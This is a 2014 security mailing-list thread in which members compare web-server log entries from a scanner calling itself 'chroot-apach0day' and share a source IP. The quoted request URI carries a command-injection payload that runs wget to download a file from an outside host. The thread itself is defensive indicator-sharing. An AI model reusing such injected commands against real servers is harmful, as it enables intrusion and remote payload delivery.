I was hit this morning about 635 GMT+1 from 162.253.66.77 My site is just a simple honeypot type site, nothing special just logs hits.
Robin On 28 Jul 2014 17:46, "Xavier Mertens" <xav...@rootshell.be> wrote: > +1 > One site was scanned at 07:55 (GMT+1) > The site was a mailman front-end. And yours? > > /x > > -- > "If the enemy leaves a door open, you must rush in." - Sun Tzu > PGP Key: > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C > > On 28 Jul 2014, at 16:30, Frank Michael <frankcmich...@gmail.com> wrote: > > Various sources confirming the same thing for other sites. All on 7/28. > Keep an eye open. > > On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote: > > I've got a site that was scanned this morning by a tool that left these > entries in the logs: > > [HTTP_USER_AGENT] => chroot-apach0day > [HTTP_REFERRER] => /xA/x0a/x05 > [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget% > 20proxypipe.com/apach0day; > > Anyone recognise it? That user agent isn't coming up in google searches. > > Robin > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > > > > _______________________________________________ > Pauldotcom mailing list > Pauldotcom@mail.securityweekly.com > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list Pauldotcom@mail.securityweekly.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
